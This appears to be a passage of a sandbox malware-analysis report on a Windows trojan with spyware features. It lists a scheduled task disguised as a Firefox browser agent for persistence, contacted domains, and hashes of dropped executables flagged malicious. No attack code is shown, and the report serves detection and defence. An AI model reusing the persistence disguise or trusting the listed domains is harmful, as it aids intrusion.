Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 44
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@47/28@87/12
EGA Information:
• Successful, ratio: 90%
HDC Information:
• Successful, ratio: 25.7% (good quality ratio 18%)
• Quality average: 52.7%
• Quality standard deviation: 40.1%
HCA Information:
• Successful, ratio: 58%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
                                                                                                        • Enable AMSI
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        Warnings:
                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                        • TCP Packets have been reduced to 100
                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 20.54.110.249, 104.208.16.94
                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, patmushta.info, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, iplogger.org, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, cdn.onenote.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                        • Execution Graph export aborted for target B217.exe, PID 6824 because there are no executed functions
                                                                                                        • Not all processes were analyzed, report is missing behavior information
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        Time | Type | Description
                                                                                                        20:22:59 | Task Scheduler | Run new task: Firefox Default Browser Agent F2854DB1E573CD13 path: C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                        20:23:14 | API Interceptor | 1x Sleep call for process: 9779.exe modified
                                                                                                        20:23:17 | API Interceptor | 7x Sleep call for process: svchost.exe modified
                                                                                                        20:23:24 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
                                                                                                        20:23:27 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        No context

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASN

                                                                                                        No context

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9460.exe_a795f71fcebe6b2e8adb61dbd3d258672ff4a7_b23f96db_139a0798\Report.wer
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.813617660062026
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:j4jgF/9bh+pmLiubWOQoJ7R3V6tpXIQcQec6tycEfcw3G+HbHg/8BRTf3o8Fa9iT:AgV9ZiuV8HQ0l7jIq/u7sGS274It7S
                                                                                                        MD5:A60CCEFB33BAB838A0842CE35C11B296
                                                                                                        SHA1:F9D2E8B7F00B0CCCC3628A83DD8BAB2CA02358B8
                                                                                                        SHA-256:985F759F3AC2C2682B9DA5D2DC3D5AEE1A5EA8595612DE30B49F43CD6D7AEE17
                                                                                                        SHA-512:12CFA5CA972022E82E47B97CFBBBD2D22BB9474C921FF2B0D4BCA5EE0D371D5E62F50A72A89F3F6F0192B47A9A42347AC44B3D6FAB4B64C3F7BEA616EDAD218A
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.9.4.1.9.5.0.7.4.3.4.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.9.4.2.0.5.8.2.4.2.8.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.a.e.5.6.e.7.-.8.e.e.b.-.4.e.f.7.-.8.4.b.5.-.f.c.b.4.e.6.8.2.d.a.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.4.3.2.1.2.6.-.b.1.1.9.-.4.6.9.1.-.9.1.7.f.-.3.8.c.0.4.9.4.3.e.3.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.4.6.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.d.0.-.0.0.0.1.-.0.0.1.c.-.4.9.4.9.-.1.2.9.7.c.7.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.e.0.7.2.6.a.4.5.5.3.5.8.c.8.2.d.c.a.e.5.6.7.a.f.4.f.3.5.6.6.a.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.9.4.6.0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER61A4.tmp.dmp
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 14 streams, Sat Jan 15 04:23:16 2022, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):42152
                                                                                                        Entropy (8bit):2.001519542059326
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:AqyPvcFZtwUnOeh0kA4pNOuh5pJN+pnv162COtEjU:DN/2eOcBfnQvHujU
                                                                                                        MD5:B7A83B68D7813C5F6EE4A8C08D3CABE0
                                                                                                        SHA1:5FD3BA4981C8B276FB5CA3003693E54BB27A42C5
                                                                                                        SHA-256:AACA056F1CFB12EFB8F3CAEC53ECF0F509FA017B166726784FD3FECE706811FF
                                                                                                        SHA-512:D6E974EE11C64540E0B3DC8314873E69A0E8FE7B34509150E148121E65B5CD02A5A0E1017A0D06AD7B2A36B7D34DC4646CF0D62673CE24EB7A98E16B3E0859E4
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: MDMP....... .......4L.a....................................4...v(..........T.......8...........T...........................x...........d....................................................................U...........B..............GenuineIntelW...........T...........(L.a............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A11.tmp.WERInternalMetadata.xml
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8392
                                                                                                        Entropy (8bit):3.700484672359636
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Rrl7r3GLNiyl6h6YFjSUYZ64gmfIRSvCpDlb89bO0sfs9Oam:RrlsNiY6h6YhSUY7gmfIRSpOnfsq
                                                                                                        MD5:0B7724FCFB03841A321D2C0F6F53A7A5
                                                                                                        SHA1:ABF661A74D8E477B637D1C03A72B31017669DCA9
                                                                                                        SHA-256:3EE72172DB782E753D2497C4F209B933F976A916BAAFB3DB80813E9F04D91C8F
                                                                                                        SHA-512:9138CDFA618C891CA853EF8FA2577C4D0E4AED35F258CD938D5FA18663CEEF739A2C6C275DF5AE91FF9ECF87767CCD5B3DFBEB8D1954AE556992A2EF0773C2E3
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.0.8.<./.P.i.d.>.......
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E58.tmp.xml
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4685
                                                                                                        Entropy (8bit):4.475137069137135
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwSD8zsYNJgtWI9CsWSC8B/8fm8M4JB8qFz+q8vZ8WGP+Md:uITfGJFSNGJtKjGP+Md
                                                                                                        MD5:A33297D249A4C58DD86EC3E200BFF672
                                                                                                        SHA1:E75531810FA3D1DD508D5C3B25E56E0C4C79B0D8
                                                                                                        SHA-256:CCAB04CB11A5EAD4FC23C03D8D54C6507DC04465D061871E4EEB773D877A7952
                                                                                                        SHA-512:82C9907345C2D0C3DCA0EE5A0651CB9141838468012386F2D17E61D5D7E64D6F4F98B42181B44F4BCACC0E02693C73A58084404C1E558581423EF2F94407D26C
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342893" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8697.tmp.csv
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):51890
                                                                                                        Entropy (8bit):3.0460149625790156
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:C/H4tWOnf0/Tb1/b+0l4Rydn5pbpF6Ftr6e2O9bB7d7cF:C/H4tWOnf0/Tb1/b+0l4Rydn51pF6FtK
                                                                                                        MD5:13395807C13FB08FB931641359AB795A
                                                                                                        SHA1:8AE0B8AE275A37A1C79B897A0DCF9A93AD4D502F
                                                                                                        SHA-256:0FC39CE42D88AABF23DDD4BC5FEF804DF4630C19540F1EF2D4CE5FF4F1300131
                                                                                                        SHA-512:2E0F41ADF15593D761D8754C5CE4C0B53BEEEAF7620FF39F37EF7B6A57FBF9DC8A08371405AD673FB7E9DE07849CA7807CDCA965BABA51986CE5D5104442CC7F
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B7A.tmp.txt
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13340
                                                                                                        Entropy (8bit):2.6960283297412
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:9GiZYWyxWpTYgYFWXGLH0YEZV5t2iFOxDAwlcZdgaoI7Ot2IfX3:9jZDnHJwckaoI7OtxfX3
                                                                                                        MD5:FDBF9CAA9D523FEEA1B571086287CD5E
                                                                                                        SHA1:4B8D9B60F59810A690638F7C31339B1C7F9581C4
                                                                                                        SHA-256:0573A32B634212500AD0FBD5423788CF7A3075F94B76045BF7861889639DB414
                                                                                                        SHA-512:9F32E558A86F8AC7C06E69A9A1701C1E66BE3B4BFA7AC5DDDF33A3DD9B993F8AF96028639FD70CF3146D27896867C9B9C4070D0AE68A693A1FF3DFA13C4A2D3D
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B217.exe.log
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\B217.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):700
                                                                                                        Entropy (8bit):5.346524082657112
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                        MD5:65CF801545098D915A06D8318D296A01
                                                                                                        SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                        SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                        SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                        C:\Users\user\AppData\Local\Temp\293.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):905216
                                                                                                        Entropy (8bit):7.399713113456654
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                        MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                        SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                        SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                        SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 34%
                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                        Reputation:unknown
                                                                                                        C:\Users\user\AppData\Local\Temp\2EE4.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7336391
                                                                                                        Entropy (8bit):7.993025428513385
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:196608:76+hvICteEroXxqENE+sKsXXgvkz+AlnhMCRKsAN2aL:DInEroXjsKkXgsCMhkrNF
                                                                                                        MD5:CBE604877A46CEEBA112802BC17FFEF8
                                                                                                        SHA1:E85AB4CCBE491348C39F751162FFF71A90643ECA
                                                                                                        SHA-256:32703A3D88B3E9B8FE1A64FD1CBCC0925FC2C74BCBDEFBBD6944CBFAD0029FEC
                                                                                                        SHA-512:86F3946B813FB457D95B6635FA308DA1BF5F2C0FBD5BDCA75F7776D1A01A2D3C67A8A9E268DCC145FF575D70FBE84BE9BEB112A0D2269B955795C74468C00598
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        C:\Users\user\AppData\Local\Temp\3657.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):54272
                                                                                                        Entropy (8bit):4.125149292696976
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:s7yxMfjf6NrLqKZ6mXS9LzL1pvULIRPqY2F3991ZuBhyY8PGCz9QwAOSZCGQyBbf:KyufjSLq86mXS9LzLdqY2LHZ4cZA
                                                                                                        MD5:1B1E4286625BB189A526E910F2031C7B
                                                                                                        SHA1:650C0550F12C65D9841D10AB589FF39261018957
                                                                                                        SHA-256:C9D7CB68DEC80469C3C03B0E90C7AF1972462CA7779424DB3BFD9D44AEBAA624
                                                                                                        SHA-512:68F2366606B658FDDB2B5E9BAE2E6931FB455A230F8A4813EACB38A3D7853B9640F46FE9EE6FFD9862A509558B66C30A3494CB7231C3EF7CD784950771273155
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        C:\Users\user\AppData\Local\Temp\41A3.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3576320
                                                                                                        Entropy (8bit):7.9976863291960605
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                        MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                        SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                        SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                        SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        C:\Users\user\AppData\Local\Temp\48E7.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):905216
                                                                                                        Entropy (8bit):7.399713113456654
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                        MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                        SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                        SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                        SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 34%
                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                        Reputation:unknown
                                                                                                        C:\Users\user\AppData\Local\Temp\50E7.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:MS-DOS executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):557664
                                                                                                        Entropy (8bit):7.687250283474463
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                        MD5:6ADB5470086099B9169109333FADAB86
                                                                                                        SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                        SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                        SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                        Reputation:unknown
                                                                                                        C:\Users\user\AppData\Local\Temp\72B9.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7336385
                                                                                                        Entropy (8bit):7.993036026488077
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:196608:l++hvICteEroXxqENE+sKsXXgvkwuUxNhMC/CKN7kL:BInEroXjsKkXgs/EhWKNY
                                                                                                        MD5:AE6510D9815C44A818F722ECAE6844B8
                                                                                                        SHA1:2A34B5110F5C3C2424AE9685F57261E2546BD963
                                                                                                        SHA-256:C3CAD582268B165711E2F2B1834891C7BCB5E57A7EFB1E709E3DF19D011AD656
                                                                                                        SHA-512:8CAA9E661403D5D86F69E7C35E45CDF927EF9EC0C6045ED2CA5AF2EAAF26B4F99291EADAF2F0C8C00A31B05B228C6DF0C4BD205A7B3EC70E263313A08FFEF4F8
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        C:\Users\user\AppData\Local\Temp\7F9A.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3596288
                                                                                                        Entropy (8bit):7.997492170986202
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:49152:x+8QEA1GN2zhieKqcTe0f3nWNHiZWf5dxQNPY7wUE9E8gnH43lvn/3juAVUk3Imp:xZ3KKqcTMNIWBnYAlRo7uOUk3ll4UMS
                                                                                                        MD5:8897C1354CB525DE5F4DE514D6FE836D
                                                                                                        SHA1:2F92D4CCA4D7576603A442BBACB87450F41CFE6E
                                                                                                        SHA-256:407C68405D373D2C8EF66B004B293BE25D571348E8922D02D7B79EB20A5138DB
                                                                                                        SHA-512:A46C6F7BAF298C34607701353E136120153521326A77C787F62F8BF439BB7DEC188A757271B4C8E47E650E86272159FD5D072A1530195D60900FEB8C481F671D
                                                                                                        Malicious:true
                                                                                                        Antivirus:
